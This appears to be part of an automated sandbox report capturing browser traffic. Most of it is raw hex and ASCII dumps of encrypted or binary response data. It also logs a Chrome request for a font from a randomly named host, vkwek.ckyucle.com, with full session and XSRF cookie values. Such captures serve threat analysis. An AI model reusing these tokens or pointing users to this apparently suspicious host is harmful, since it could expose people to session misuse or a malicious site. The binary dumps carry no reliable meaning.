                                                              2024-07-03 07:41:07 UTC1369INData Raw: 0f b7 3d 62 5e e9 ec bf 1e 69 44 96 e1 11 7d 20 8c 8e 20 be ec 62 a6 ec fc 7d 44 49 76 75 d1 71 04 88 0f d8 6b cb 96 34 d2 0c f7 cc 14 40 c0 10 ce d5 ff 50 2a b0 b0 6a dc ed 89 29 f7 ec 94 27 df 4c 97 eb 89 c9 c2 ae b3 dc b1 62 e0 85 52 51 6a 49 2a 49 9b b4 51 6b da 54 ae 6c fa 5f 77 4f 0f d0 92 24 cb 1f e8 08 21 63 cc 2e 25 cb 7b 80 95 5f 4e 90 02 45 40 fc 00 0d 92 41 b0 da 9d f9 3f 9c ee 9a d9 61 57 0b 79 99 67 66 9d 67 1b 26 45 bc 0c f7 20 7e 88 78 f0 62 c5 cc 83 05 b5 62 c1 82 85 7e f8 a7 d6 f4 ef 1e 66 2f 80 a8 0a 1e d0 47 8a 82 b3 9d 4a 1b 36 b2 79 fe b3 df fa 0e 7a 45 40 54 9c 61 aa 30 5e 55 6c f6 df cf 06 00 fc 53 3a c3 bf 92 2c 03 9e 7d 04 1b 42 ec 52 a7 a8 52 74 7e b7 76 d1 85 00 ba 4c 3a 60 34 c1 49 4b 41 1c e6 bd a7 56 a3 ca b1 b7 78 26 40 a1
                                                              Data Ascii: =b^iD} b}DIvuqk4@P*j)'LbRQjI*IQkTl_wO$!c.%{_NE@A?aWygfg&E ~xbb~f/GJ6yzE@Ta0^UlS:,}BRRt~vL:`4IKAVx&@
                                                              2024-07-03 07:41:07 UTC1369INData Raw: db f2 6c 99 b1 ee b6 3e d8 2e 6d d7 b6 39 fb 46 fb 99 7d 9e 5d 57 72 91 73 73 4b bc 1c 72 12 ba 1e 36 36 7c 33 22 22 2a 2a 26 26 21 c1 e1 10 c5 bc bc 32 65 90 3a 76 de b1 83 76 d7 75 c7 d1 ff bd fa ef 37 7f f3 ee 97 3e fc ec d3 2f 3e 0d 7f 59 f7 9d e0 41 40 40 00 c8 82 05 10 40 c9 06 6a 8b 76 3f a2 63 04 fc cf bf 1a e0 05 82 e1 03 a0 ae 09 a0 0b f4 c0 a3 aa 1c 80 71 5b ad cd 01 38 80 ba 26 50 ed 76 16 e9 84 82 9d 77 d3 ef ac 8c 5b 06 e0 52 8b 81 00 1e 2c a6 f3 af 20 bc 4c 15 e0 d4 43 23 d6 51 35 b8 91 3c 4e 8d af 4d f0 9a f0 ff 89 98 49 1e c3 96 a1 ef 1e ef ae 41 39 d4 0e be a1 72 98 1c b4 98 29 ef a4 9e 40 7d 80 28 93 fa a9 ef 70 df d3 54 b5 e2 d5 ba 81 b2 f7 81 f6 10 fa 79 c4 7a c4 26 c4 11 70 a2 46 71 8f 62 7e 37 d0 ca bd 8a d4 e0 c1 fc fb 48 b3 d9 1f
                                                              Data Ascii: l>.m9F}]WrssKr66|3""**&&!2e:vvu7>/>YA@@@jv?cq[8&Pvw[R, LC#Q5<NMIA9r)@}(pTyz&pFqb~7H
                                                              2024-07-03 07:41:07 UTC1369INData Raw: a9 19 64 33 3f 2a 25 ab 11 e4 13 01 e9 44 ae 3d cb 5b 69 7e db 22 51 70 ef 63 32 39 e9 64 71 a7 b5 30 b6 01 15 1a 29 e2 db ce 53 01 4b 24 89 db 11 9c 91 10 7d 9c ef d5 0f e1 38 11 2a 9e 08 b1 c6 95 68 36 08 c4 a8 a2 b4 98 b5 21 8e 45 d0 71 24 18 a7 83 42 25 37 a3 0f 52 82 02 89 71 3b a6 33 e3 76 a8 96 c5 96 00 31 78 04 a8 30 14 19 d5 19 35 da 35 a1 cc 49 64 7a 77 af a4 2d 6a 48 d5 f9 10 15 85 2c 13 a3 9e f6 44 fc 18 de 56 cd 85 7c a5 47 ac 97 c9 a3 b9 57 e1 c4 0a 96 52 70 14 1b 9d cf 6b 27 9f a5 fa bd 08 79 02 2c 96 02 20 16 9d 4d 88 68 fb d6 4a 21 21 6d b6 8c 58 80 8a 4a bd a3 a3 79 25 a6 aa 2e 1a 3d c6 77 60 74 91 90 6a 2a 81 e2 98 32 ad 42 a4 cf 75 c9 16 1c 25 3d 79 6f 32 9f 8e cf 45 7e e6 05 e8 4e 24 f2 4f 2c 8e ab 2d 9c 9c 76 49 bb eb d8 5e de eb 78
                                                              Data Ascii: d3?*%D=[i~"Qpc29dq0)SK$}8*h6!Eq$B%7Rq;3v1x055Idzw-jH,DV|GWRpk'y, MhJ!!mXJy%.=w`tj*2Bu%=yo2E~N$O,-vI^x
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 94 34 75 e8 49 d3 5e 26 60 bf a5 86 5b 4a 69 0c d1 e1 b8 20 fc 23 8b 97 28 3f 36 3d bc 0d d8 3d 52 72 fe 9d 98 df f6 99 86 c4 bc 22 f8 09 5a 28 e5 b7 77 89 61 b7 36 f9 53 75 68 4b 1e a3 d9 26 75 d4 2c cc 9b ab c9 a0 c4 be a0 65 70 6a fc 71 23 f4 aa f8 fc 97 90 31 c6 86 3b 8d 2e bf 22 ac c8 63 a8 a4 64 cd 76 00 e5 20 65 ff cf 30 3f a6 13 d2 e5 62 0b a4 27 2d 7d 39 cc f0 e0 9e 1d af b5 ec 6f 86 84 31 96 bb 8e 91 1f de f5 79 ed 91 b4 46 3e b6 fa d8 67 65 be e3 e4 c7 96 8c a1 bb 91 79 70 21 64 5b 43 4a bb 5f ce 7f 6a 9e e2 6c 74 bd 98 84 44 03 65 56 43 e1 02 9a f1 01 c9 b2 0e 5a 9a 74 1e 19 d7 2d 04 6b 89 4f 3e 7f eb 62 e6 73 66 69 2d cd a3 e6 3f 27 75 aa 1d f4 11 10 73 fc 42 d2 5a c5 86 43 23 db 5e 68 e7 7a 4b d7 dd 63 72 dd 6d 59 de 57 ba ed 90 63 7c a6 8b
                                                              Data Ascii: 4uI^&`[Ji #(?6==Rr"Z(wa6SuhK&u,epjq#1;."cdv e0?b'-}9o1yF>geyp!d[CJ_jltDeVCZt-kO>bsfi-?'usBZC#^hzKcrmYWc|
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 4c 93 b6 dc c8 6b a3 ce 59 5f c3 25 0b 9d f2 4a e9 03 fe a9 a9 bb 81 48 18 fa 58 6c d7 68 8e c9 73 ff 93 f3 ea 71 72 7c d4 67 35 e2 25 58 ad 9b 53 bb 0e 1a 84 1a b8 82 5e 74 f8 f1 ff 58 67 54 9d 62 90 e9 68 f1 c4 58 64 f4 a7 11 7b 4a 5a 49 91 3e 4e c4 a0 f3 c2 16 05 ca 58 f5 2f 67 94 92 df bd d2 cb da 8d 4e 2f c9 b6 83 3e 5b 35 3d f8 fc e3 65 9c 37 d6 d2 a2 c6 49 f6 ae d8 e1 89 37 ae 63 7d 3f 6f 70 d7 3f 3b 22 5b 75 e5 01 5e 3b bd 02 7a e2 ad bd 31 24 3b ab 34 eb 3d 4b b2 d1 8a eb d4 09 e1 09 bc 2e 7f c6 88 31 51 e6 fa 1c 6a c5 06 7d 66 4a f0 e0 eb c6 48 eb a6 3e de c9 7a 7d 78 4b d7 98 bd e2 c3 08 cd f3 88 6d ff fa 2e f6 41 89 df d6 d2 4a ff 7b f6 01 aa 12 65 af e8 2b 9c 2a 6b b9 21 bb 8c e8 e3 a7 1f ef 6f bf d7 f8 0b 47 b0 c3 71 a6 2e 6c 7f 81 ee 98 c2
                                                              Data Ascii: LkY_%JHXlhsqr|g5%XS^tXgTbhXd{JZI>NX/gN/>[5=e7I7c}?op?;"[u^;z1$;4=K.1Qj}fJH>z}xKm.AJ{e+*k!oGq.l
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 4c 1e ba 59 30 8f 71 e0 45 cd 17 36 9d d7 1b 32 2a 11 0d 58 a9 2e 71 1b 1f 61 c5 f5 94 ef d3 73 ea 88 7e fb b9 e6 e1 b6 70 c5 34 0a fa 3b 86 fc cc ba 3c 05 7c 34 ea 88 f5 a3 a2 c0 20 35 13 6c 15 e6 41 b8 3e b6 11 22 ac 69 58 6e 3e 6f 9f 28 7b a8 5f 8d bd 76 d8 eb 29 93 79 48 c9 a3 99 6f 6d 06 7f 5d 9e f1 6c 7c 55 3b 55 c9 af 3f cf 18 45 2c 1f 72 44 e3 8e 81 85 63 86 d5 6b ad b7 62 ee 7b 30 a5 df b6 73 24 1a c7 c1 b3 0d fe d9 73 ef 8f c3 b0 9d 51 f5 d7 70 ba 54 f4 24 dd 1a 73 5e 9d 9c 39 5d 1e 8c 82 fe 2c 1f ac a6 0c ba fc c5 27 14 94 19 0f 5f 43 a0 42 02 67 1f be 85 af e9 f8 fc a5 c4 0d b4 f6 ff a2 a2 95 1c ec dd 96 1c e3 1d 16 52 27 61 e2 78 29 ad 1d 7e c2 7e d3 02 91 a1 b6 1e d4 a0 32 62 5d 05 eb 60 2f a3 ce 28 2a e3 76 d1 e6 94 8a 9e 84 ca d4 81 95 59
                                                              Data Ascii: LY0qE62*X.qas~p4;<|4 5lA>"iXn>o({_v)yHom]l|U;U?E,rDckb{0s$sQpT$s^9],'_CBgR'ax)~~2b]`/(*vY
                                                              2024-07-03 07:41:07 UTC1369INData Raw: ee 78 43 e1 f8 8c 32 f2 52 b9 28 d4 a6 32 9a 40 88 66 46 b8 5f 12 ff ff f1 87 04 f0 10 a2 2a 99 3a 19 38 85 1e 76 b6 ca 97 a4 50 a1 74 c5 4a 64 28 d7 28 4b 8b 76 a5 ba f4 a8 34 64 58 ad 57 5e a9 37 61 5a 83 05 0b b0 56 ec 6a b1 ef 8d 6e 47 be ea 77 69 c1 73 7e 5b 36 e1 26 c8 81 08 6c e7 58 14 76 72 2e 2a 52 87 d1 0a 77 14 a7 68 9f bb 2f d5 97 1e 6b e9 a2 36 6d fd ae 5d 6f 7f 1a b0 82 9f bb 29 b7 d4 fd 91 ac f6 10 55 d6 d9 81 2f c0 08 b1 30 af 61 14 e9 1d cc 52 bc 9b 4d aa f7 6a 94 66 cc 30 31 cf 58 e7 eb 7d 07 9e e7 07 f4 ff dd 72 11 79 f7 17 5f 34 4c 30 6f 52 00 13 2c 5d 6a a1 96 01 ec 65 65 8c c9 a0 60 fb 80 e3 33 a2 57 29 00 94 cf 1c 2c af 0c ea d6 9e 38 04 86 2f cf 6a 38 67 ad fd e2 eb f5 49 f1 24 1f c0 fb 3c e2 91 ad 41 0a dd d8 dc da de ed 78 67 77
                                                              Data Ascii: xC2R(2@fF_*:8vPtJd((Kv4dXW^7aZVjnGwis~[6&lXvr.*Rwh/k6m]o)U/0aRMjf01X}ry_4L0oR,]jee`3W),8/j8gI$<Axgw
                                                              2024-07-03 07:41:07 UTC1369INData Raw: a3 f3 33 98 2c 41 21 b6 b0 88 47 91 d7 a4 a8 59 49 85 cd e8 3b 74 ea d2 ad 47 af 01 83 2a 50 d0 30 b0 86 e7 e1 2b 22 33 b7 92 8a 9a 86 56 b1 9b 6b ab d7 c0 f1 42 d4 c9 4c 7c 57 eb 35 6a d6 a2 4d 87 17 ba 74 eb d5 6f f0 25 a9 7f fd e7 cc 5b b0 68 c9 b2 15 ab d6 ac db b4 65 db 8e 5d 7b f6 1f 5c 46 ee 05 c1 f8 3a a8 e2 f4 ae 1d 96 85 be 31 95 e5 ba 29 b3 5a 43 66 ac 5d ff 03 0f b1 75 01 fc b2 4f 81 3a f6 64 4f 47 bb 09 e2 3c 29 42 ad e2 3e 22 4d c4 96 88 6b 74 7e fd 64 e0 75 81 12 2b 3a af dd 10 60 9b 79 6f a0 89 16 44 eb 3a 5f 22 ef c0 43 4c be cd 4a 39 0e c7 e5 59 da 0b 4e c2 cb e5 0c c1 50 23 94 b7 f3 4e de 25 4a c6 14 ad b2 60 08 6e 56 39 dc aa d3 6a 2d 0f 41 b9 5a df dc ee da de da be da fe 15 9d 13 bc 46 63 60 98 0d 8b 15 9c 87 cd 92 34 67 eb 36 27 78
                                                              Data Ascii: 3,A!GYI;tG*P0+"3VkBL|W5jMto%[he]{\F:1)ZCf]uO:dOG<)B>"Mkt~du+:`yoD:_"CLJ9YNP#N%J`nV9j-AZFc`4g6'x
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 57 85 84 d4 2b 00 1c 18 0f 5d 54 95 c8 98 28 93 32 63 a4 7d 4c 7f a8 5d 3c fc e6 0b 52 65 a8 96 ad 58 0e 9c 5d eb b6 6c 47 61 61 c3 76 2e 25 66 40 87 ee 2b 77 72 0b b9 36 71 8f ab 5f 1d 5b f5 cc bb 91 f0 45 30 3e 81 94 2f a3 d2 8e 56 37 3a 3d a8 75 61 30 8d d1 0c 4e 07 58 6c 60 b7 83 db 11 56 9b 78 3d f6 4d 93 ef f2 ae 35 07 29 06 c0 76 69 21 92 12 8b a1 27 35 49 2b 44 12 93 cf 48 71 b0 40 ca 43 53 1d 9e ca b0 90 23 52 1b 9b e6 94 b4 a7 a7 35 4d 21 2e 87 4c c3 aa 9a 97 c9 d2 f4 17 66 95 1f bf 28 5e 61 c2 ca 24 35 89 ab 13 55 a5 5c 9f 62 5d f2 f6 6c 6f 17 b8 23 ef de 82 df 2a 60 7b 41 6f 16 f1 7e 31 ad 15 2b a1 9d 92 db 2f b1 dd 08 f8 24 f1 58 b6 cd cf a7 2f 72 be 06 8f cf 43 45 27 ad 4d b5 a1 b3 3a 34 5b ca 51 91 0f 59 c2 86 19 45 7e 58 f8 7b 3d fb a0 a4
                                                              Data Ascii: W+]T(2c}L]<ReX]lGaav.%f@+wr6q_[E0>/V7:=ua0NXl`Vx=M5)vi!'5I+DHq@CS#R5M!.Lf(^a$5U\b]lo#*`{Ao~1+/$X/rCE'M:4[QYE~X{=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              53192.168.2.662934188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:06 UTC1404OUTGET /ef6ywsH6ValAwIHzgds78wUwuLf89smkl92 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Origin: https://vkwek.ckyucle.com
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: font
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:07 UTC632INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:07 GMT
                                                              Content-Type: font/woff2
                                                              Content-Length: 93276
                                                              Connection: close
                                                              Content-Disposition: inline; filename="ef6ywsH6ValAwIHzgds78wUwuLf89smkl92"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wufpx3V8YzRInffQtrm%2BAWDhpMoHDM7uwba4A6iknRV48hAABCT3azXfHycT6HH9VisQbretJqwbS6rdJJPRLA%2BGmMlkly3uomdskVyT3z%2BAPX2nJmEu2INbB%2BFfJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b3439485e66-EWR
                                                              2024-07-03 07:41:07 UTC737INData Raw: 77 4f 46 32 00 01 00 00 00 01 6c 5c 00 14 00 00 00 04 b2 20 00 01 6b e0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a a4 76 1b 83 bb 26 1c 93 24 3f 48 56 41 52 a0 6a 3f 4d 56 41 52 81 46 06 60 3f 53 54 41 54 81 36 27 38 00 91 18 2f 81 48 11 08 0a 81 f8 0c 81 d3 78 0b 89 1a 00 30 8b e7 3a 01 36 02 24 03 92 30 04 20 05 97 7a 07 a2 17 5b 12 9a 94 07 25 22 db df 13 ba a5 ab c1 a5 a2 a8 fe 21 df bb 49 da 54 19 b0 7f a9 77 90 21 63 9b 48 1d ce cd 74 1d 5d 6b a5 08 9e a7 0f c8 36 9d f1 82 43 79 c3 a8 7f 55 6c b7 72 65 ff ff ff ff ff ff 9b 92 49 8c e9 25 e8 25 f9 7f 00 15 44 45 b1 a0 ba ce 76 d3 69 ae 51 46 38 dc dd 84 83 d2 69 48 19 21 72 0a ca e2 f4 da d1 50 34 5a 5b b9 db ae 1d f6 5a 73 10 9e 89 b6 6f 06 0e 72 ef e2 38 62 1c 4f e8
                                                              Data Ascii: wOF2l\ kv&$?HVARj?MVARF`?STAT6'8/Hx0:6$0 z[%"!ITw!cHt]k6CyUlreI%%DEviQF8iH!rP4Z[Zsor8bO
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 10 0f f1 f9 f3 34 67 bd 3f f3 47 f2 33 13 26 d3 99 30 4c 26 e9 24 85 40 52 36 bb a5 e2 88 55 8c 15 6f 9d dd 3a ed 9a 53 a7 3d 0a d4 1c b3 db 62 55 0b a1 75 ca 5d 7a ac 57 38 5b 55 18 7c 37 fb 27 fe 25 e6 f2 75 2e 9c 88 31 31 8e 19 67 3c c6 ba 5e c7 a0 eb fa 4a c9 da 50 42 1b 4a 48 42 02 11 f0 6b fa b3 0f 0e 89 0a 91 8a 5d c4 80 28 24 a5 0d 44 ae 16 ab 53 22 75 be b7 ce 37 e2 fc ab 39 9f 38 15 a3 ee d4 9c 1a 55 a3 e6 37 13 d4 a6 ed 52 24 04 df 78 a9 f9 ac 67 d0 58 9b 7a 56 81 2c a8 24 a5 19 ab 89 79 c6 3a 8e 8d 8a 88 86 51 24 4f 4d c7 b1 f6 b7 9f 71 cc e7 20 a3 88 08 28 df 96 4f e5 14 c4 00 22 12 64 3c 07 6c c8 ed 39 a9 fd 7c 5e 42 08 72 b6 35 8f d0 c3 f3 a7 fd cc b9 79 69 bb 44 99 0f b9 5f 84 16 09 3c 50 9b f9 6f 92 11 08 a9 28 52 65 ab 49 eb 90 c9 96 9a
                                                              Data Ascii: 4g?G3&0L&$@R6Uo:S=bUu]zW8[U|7'%u.11g<^JPBJHBk]($DS"u798U7R$xgXzV,$y:Q$OMq (O"d<l9|^Br5yiD_<Po(ReI
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 8e 0c 63 96 10 1c 40 42 44 dd f4 16 cf 30 00 2b fb 79 0b 30 ab c4 72 0d 2d 40 8d fe 19 13 b5 2f 74 e2 3e 24 50 23 ab dc 2a 66 4d 64 c4 fc ff 2f 53 ab 6d 24 50 26 09 49 5d 09 75 9d 3e c1 ea 31 1f d2 98 cf 56 cd 54 a8 74 6a 7f 21 1b e3 9c 0f 44 44 22 1d 29 45 26 48 55 24 92 52 07 92 54 55 20 21 75 7d 24 c8 3a 01 40 86 24 32 00 8a cd 24 e5 2d 59 9e 72 a6 cc 4b 24 d5 13 80 aa 7a 82 60 1b 94 34 ce 2d 67 b1 1c ca 96 d5 9c 33 32 e3 a4 1a e3 36 db 24 c7 b1 8d db a9 6a 45 cd 8a 9a 55 8a e3 a8 9a fd 86 aa 55 d5 ac d4 1a bf 33 7e d7 67 f8 e7 6d 4f ce f6 e5 66 e3 7f 46 56 c8 0a 61 36 e5 a3 4e 26 1e 46 a2 08 72 83 40 08 87 47 e1 7f 99 5a a6 68 7c 99 6e 6c d2 0f 2b 33 dc e8 4e 91 71 44 5d 90 6c 29 8d ba 7f af 41 f7 5b 43 0e ce 0d 46 16 90 e1 0e ce 11 23 c7 5d f9 38 5a
                                                              Data Ascii: c@BD0+y0r-@/t>$P#*fMd/Sm$P&I]u>1VTtj!DD")E&HU$RTU !u}$:@$2$-YrK$z`4-g326$jEUU3~gmOfFVa6N&Fr@GZh|nl+3NqD]l)A[CF#]8Z
                                                              2024-07-03 07:41:07 UTC1369INData Raw: e1 43 b4 b6 e2 5b 28 0a 7e 3f b8 60 01 41 a5 a2 9d 5f aa aa 92 e7 97 9e 00 03 7a 83 f2 df f4 f1 96 7c fe b4 e4 ea d5 9a f9 6c b0 ba 4a 10 6f b7 59 2c ed 74 74 e4 f7 a7 d3 2b 96 40 40 51 66 f5 e7 a0 33 8f 73 f2 d6 c3 e5 9d c3 71 fc 46 72 66 3c 24 2e ce 60 06 3a c8 29 d6 a8 8f 62 ff a8 a5 b5 cd eb 44 76 4b 25 94 fc d0 62 76 e3 42 5d fd 97 64 4c 8b a5 52 6f f8 db 8f 00 94 fc c8 46 5c bd 1c c3 40 2b d1 7a 43 c4 ad 17 b2 b7 ee 9b 4d 09 0d f9 6d 07 99 10 1d 47 e6 96 3a 20 3d bc 3a 0d 3e bf 95 84 ea 25 93 ae 69 08 6c df 80 35 2a 08 70 c7 de 92 9c 79 e0 1a 17 e6 d0 2b 30 1e 2f 83 0e c7 e9 73 30 77 e7 e6 02 22 bb d8 06 99 5b ee 22 53 80 20 c8 6e 2c 06 05 26 12 28 14 52 ba 16 12 3d a2 47 3f 10 f5 06 a5 24 4d 82 75 e6 ad 90 27 62 69 e9 36 4c 84 88 93 25 f6 f6 23 80
                                                              Data Ascii: C[(~?`A_z|lJoY,tt+@@Qf3sqFrf<$.`:)bDvK%bvB]dLRoF\@+zCMmG: =:>%il5*py+0/s0w"["S n,&(R=G?$Mu'bi6L%#
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 54 e7 d6 9d 2d b4 a6 93 cf 99 1f a7 dd 6e 68 53 44 dd 65 65 89 d1 c0 a3 92 64 cc 31 18 63 26 13 31 4e cf 58 79 53 b2 2e db 9a 28 b6 9b 3c a6 00 5c 5e 11 8b 83 4b be 05 32 16 f2 27 f7 9c df b0 9c 1c 87 3a fa 62 03 4e 5f dc 30 32 d9 0e 2d 29 bb 39 86 5a ea 25 1c f9 80 80 d3 b0 59 47 03 e1 38 0e 99 e4 42 e4 67 ce e4 d4 da 88 c7 03 50 4c 29 22 8c 02 70 3a 8b 8a 3b 0f 04 48 26 b5 d1 e4 52 e7 01 3b 4a af d0 d3 a7 68 fe d1 72 c3 4a 60 ba 24 bf 8f 51 eb 11 25 b1 c6 4b 41 a6 d8 73 32 1b 16 4b c4 62 8e e3 36 ec 6e b3 cd 37 b4 0e 4b 95 68 ab 33 1a 0d ac 6a 2b cd a4 45 22 f2 62 82 62 42 1d c3 cc f9 59 5f 50 eb 07 b4 8a da 4d aa 17 47 d3 fa a5 80 8d 11 25 a5 a5 8e 5b 88 5c b9 82 21 5e 88 6c 18 63 03 d6 93 18 f3 cb 40 59 d9 d2 20 37 88 18 e8 62 0c ab b3 f8 99 33 4f d5
                                                              Data Ascii: T-nhSDeed1c&1NXyS.(<\^K2':bN_02-)9Z%YG8BgPL)"p:;H&R;JhrJ`$Q%KAs2Kb6n7Kh3j+E"bbBY_PMG%[\!^lc@Y 7b3O
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 9f 82 2c b7 fc 55 50 9b 51 70 75 a8 cf 20 94 27 85 0a 16 c2 d5 50 55 97 db 1a cc e4 ea f8 bf 7f 82 9d cf b0 bf bf a8 d2 cf 05 72 5b e8 50 23 0f 23 4b 61 90 94 da f0 4d c9 51 9e 26 0a ec ec ab 69 b4 bd c3 2f 0a f0 74 03 f6 16 2e 59 39 12 0b bc 0c 0d 75 a9 8f 01 48 d7 04 85 96 d2 ab 02 9b de 6d db bd 90 bc 86 ef 83 5a 63 5b 32 e2 71 f8 6e c1 87 75 a9 ee 4c f7 99 27 02 3c 78 27 d8 98 de f7 56 7f 6e f1 fc aa 81 eb 24 c5 fb 60 e0 b0 f2 f0 af dd 25 60 5f 6c d7 6b c0 60 ea 09 fc a1 7e ef 21 d2 65 be 87 84 64 f1 c8 69 fa 9c 49 2f cf 79 79 88 42 e1 4d be 7d 02 60 bf 63 b8 ea ea 63 24 2b 5c 48 cf ca 79 d8 58 89 bd 6f 81 38 cf 87 07 47 13 25 b0 2d d0 2c 71 94 b6 07 95 04 aa e5 65 bc fd e1 eb 93 81 1b a5 d7 ee 19 35 2a 5a aa 17 d4 e1 0e 65 4b 21 2d a7 bf d7 25 e2 9e
                                                              Data Ascii: ,UPQpu 'PUr[P##KaMQ&i/t.Y9uHmZc[2qnuL'<x'Vn$`%`_lk`~!ediI/yyBM}`cc$+\HyXo8G%-,qe5*ZeK!-%
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 9a 90 a7 8b 89 35 60 8b 3c b7 b7 76 cf d3 be da d0 82 50 1b dc 81 52 9f 2b 78 b5 85 1a db 2f 23 11 ee 7e 0f 9c d7 f5 b8 cb 06 d1 4f 79 55 8a 13 9b 6a a8 95 46 95 37 af 7b 7d 90 cb 24 1d 9e 26 31 5b 76 a7 8e 76 62 74 7b e0 dc a7 f1 6e 9f 45 d5 21 b2 23 85 2c cb e7 31 09 a3 7a 4c d0 45 20 b1 44 fe 05 66 c7 02 03 dc df d5 bb 25 f4 ec 02 f0 c1 23 0b fa 7f ae 9b 73 07 7b 16 f5 36 ec ec 00 db ec 7f d4 4b 78 3e 73 73 9f 0a ae ec e5 80 c4 cf 0a 3d 62 99 08 c1 b2 7d c7 70 b5 8c c7 69 52 40 79 3c 9f b9 99 d4 52 6e df 0a 35 b9 f0 ac 83 b5 6c 74 9e b8 70 fd 1d b6 ee 75 41 04 b5 ad 5c 10 e6 ad df 53 fe 59 1e 0a 54 02 09 f8 5e ab e5 8c c5 72 4c 47 c6 3b 62 55 95 51 f0 eb 4f 75 3e 57 a6 36 98 bc fe b1 bc ff 61 18 a2 79 e6 01 b9 02 66 9e 81 b8 b7 6b 51 78 30 95 72 f9 41
                                                              Data Ascii: 5`<vPR+x/#~OyUjF7{}$&1[vvbt{nE!#,1zLE Df%#s{6Kx>ss=b}piR@y<Rn5ltpuA\SYT^rLG;bUQOu>W6ayfkQx0rA
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 62 10 69 58 16 18 ff 45 1e a2 6d 55 84 60 bb 94 83 f1 a5 aa 10 eb 80 6a 04 ba dd 16 24 bb cb 76 94 bb db 0e 54 fa b4 dd 28 f7 19 9d a8 f4 59 7b 91 ec f3 f6 a1 d0 17 ec 47 b1 2f ea 42 a1 2f 39 80 62 df 74 12 bc df 77 06 bc 3f 73 01 b9 7e ee 71 e4 fb bb 2d ec ef 7f d2 19 f5 41 7b 18 ef 31 87 58 ef 21 27 d1 79 d4 69 74 9e 74 8d 23 23 9b 2c 50 b6 a6 80 27 3b 52 c2 93 d9 40 c0 e7 aa a0 90 01 f3 29 68 ec d8 71 e2 04 83 80 00 e3 c2 05 82 1b 37 71 1e 3c 50 15 2c 96 c1 03 90 05 75 49 6e 2d 19 e1 95 12 4e d0 eb 09 a1 25 6a 42 ad 00 59 26 63 cf 71 3e 9d 2c 30 95 67 c9 12 c6 10 a1 01 97 41 48 16 7e 72 c0 e5 e1 a3 00 5c 91 be b5 13 b4 60 8d 50 60 16 62 8c 23 2c 93 87 41 a6 b8 c0 32 1b d9 cc f1 84 5d ca eb c5 8d 70 d0 ac bc 4b 85 93 72 39 40 ae f8 bc 94 2b 97 55 20 79
                                                              Data Ascii: biXEmU`j$vT(Y{G/B/9btw?s~q-A{1X!'yitt##,P';R@)hq7q<P,uIn-N%jBY&cq>,0gAH~r\`P`b#,A2]pKr9@+U y
